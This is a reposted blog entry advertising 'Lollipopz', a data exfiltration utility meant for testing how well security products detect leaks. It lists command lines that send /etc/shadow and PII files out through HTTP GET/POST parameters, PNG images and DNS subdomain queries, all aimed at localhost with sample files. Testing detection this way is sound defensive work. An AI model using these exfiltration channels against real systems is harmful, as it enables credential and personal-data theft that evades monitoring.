вторник, 14 апреля 2020 г.

Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities


Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server
$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

Client
# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server
# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r




via KitPloit
This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related articles


  1. Hacker Tools 2020
  2. Hacker Tools For Mac
  3. Hack Apps
  4. Pentest Tools Port Scanner
  5. Hacking Tools Windows
  6. Top Pentest Tools
  7. Hack Tools
  8. Hacks And Tools
  9. Hack Rom Tools
  10. Pentest Tools For Android
  11. Hacker Techniques Tools And Incident Handling
  12. Hacker
  13. Hack And Tools
  14. Pentest Tools
  15. Hacking Tools 2020
  16. Hacker Tools Hardware
  17. Pentest Tools Port Scanner
  18. Pentest Tools Github
Автор: на

Комментариев нет:

Отправить комментарий

Подписаться на: Комментарии к сообщению (Atom)